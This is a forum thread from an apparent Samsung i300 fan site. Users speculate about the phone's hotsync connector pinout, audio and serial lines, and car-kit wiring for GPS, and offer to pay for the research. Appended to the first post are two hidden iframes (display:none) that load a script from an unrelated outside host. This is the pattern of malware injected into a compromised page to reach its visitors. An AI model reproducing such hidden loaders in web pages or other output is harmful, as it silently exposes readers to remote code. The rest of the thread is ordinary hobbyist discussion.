+ Reply to Thread

Thread: i300 pinout?

i300 pinout?

Does anybody have any info on the functions of the pins on the i300's hotsync connector? Despite being serial-only for now, I suspect there's a lot more available down there that hasn't been talked about yet... Serial + power doesn't require THAT many pins...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Audio in/out

I would also imagine that there is full audio in and audio out available through the pins. IIRC, the car-mount kit turns it into a handsfree speakerphone (despite the fact that it already has that function built-in) so there would have to be some audio going through the pinouts.

-Doug

Hmmm... I hadn't thought about the phone functions

Call it a hunch, but if the i300 is using the Motorola Dragonball Super VZ chipset, it already has core-level support for USB and memory sticks. While Samsung obviously didn't add the interface hardware to interface directly with a PC USB port, and there's obviously no memory slot, it wouldn't have taken much for them to have quietly run lines from the hotsync interface to the chipset so future peripheral manufacturers could add the remaining circuitry themselves offboard and leave the possibility for future high-speed communication and/or memory and peripheral expansion wide open.

Basically, it depends upon whether the engineers (who, being engineers, will never pass up the opportunity to leave open the door for future expansion if they can get away with it, because engineers hate to find themselves painted into a corner) were able to do it quietly and keep it a secret from management (who, rather than seeing a golden opportunity for limitless future expansion, cringe at the thought of having to support third-party add-ons)

If nothing else, the Super VZ's serial UARTs (standards-compliant to 468k, normally limited to 115k) can potentially hit 4.3mbit/sec, which itself is plenty fast for near-line mass storage (at that speed, a 1 megabyte file would take about 2 seconds to load into the main system ram). I'm not, however, aware of the implications of cranking it up to 4.3 (it might require special interface hardware that's obviously not there, or require some specific hardware configuration between the chipset pin and the external interface pin that's not right on the i300).

Nevertheless, there's still hope for the future

Who do we have to bribe?

I want to know if (and how) I can get audio and RF access through the cradle. There are only three pins missing as I recall, and the handsfree kit provides audio, so I'm betting the audio is there. What does it take to use it?

Anyone know if the handsfree kit includes an antenna connector? It doesn't happen to have a serial (hotsync/"modem") connector, does it?

My dream is to be able to drop the I300 in the cradle and then use it through phones around the house. I already have all the pieces to do that, but it requires plugging into the headset and antenna jacks. (We have awful reception in our house.) That's a pain.

I'll gladly kick in some money to obtain this info.

Thank you.

Administrator

Arrow

Anyone know if the handsfree kit includes an antenna connector? It doesn't happen to have a serial (hotsync/"modem") connector, does it?
    no to both.

car kit

I have the car kit & there's no serial out. There's a single "data" cable that goes into the handsfree kit's brain.

What I'd like is for someone to figure out how to splice a standard serial cable into the wire coming out of my car cradle so I can use a GPS receiver in my car while my phone is in the hip Samsung cable.

Any takers?

Paul

Re: car kit

Originally posted by paulg
    I have the car kit & there's no serial out. There's a single "data" cable that goes into the handsfree kit's brain.

What I'd like is for someone to figure out how to splice a standard serial cable into the wire coming out of my car cradle so I can use a GPS receiver in my car while my phone is in the hip Samsung cable.

Any takers?

Paul
    Would you pay for the operation???? I will be glad to fing out, but $200 of my cash flow means at least for you to pay for the info.

operation

I've already got the car kit installed... so, I guess the ideal solution would be to buy a new car kit, build a box of some sort with an input for the data cable coming out of the cradle, a standard serial cable coming out and a samsung car kit "data" cable out on the other end. Once it's working, we could return the extra car kit & then I'd just plug the new module in between the cradle & the hands-free brain in my car.

What do you think that would cost?

I think this is the only way to do it, but first we have to get the extra parts and cables to figure out what we have to connect and figure out if it would work too....
    I thinks it is a lot of work just to do, but I tinks over the weekend I can figure this out and play with the settings.

private message

Nonopr, I sent you a private message with my email address. Please reply to that address.

Thanks,
    Paul

project funding

O.k., taxes are done. I'm back. Sorry for the delay.

I see that some people are interested in investigating pinouts and such. I offered to kick in some money and then disappeared for awhile. I'm still willing to support a project to get audio in and out of the I300 through the bottom connector.

Right now, however, I'm much more interested in getting audio out of the included (desktop) cradle (instead of the car mount). It's missing three pins by my count. Are those critical to audio?

How 'bout using the serial line for audio? Can we bypass the analog system? That would be wonderful for my application.

Thank you.

--kyler

P.S. I'm still bummed that I can't attach an (effective) antenna to the I300.

(Click a sponser today!)
    Miami,

Check out this link to another discussion:
    http://www.sphi300.com/showthread.php?s=&threadid=1482

Download the 7th PDF "retrieve" and if you have the Korean language add-in to Reader it appears to have what you want.
    Gary

i300 pin out

That llink is invalid. Where can I get the pin out.

thanks.

-Henk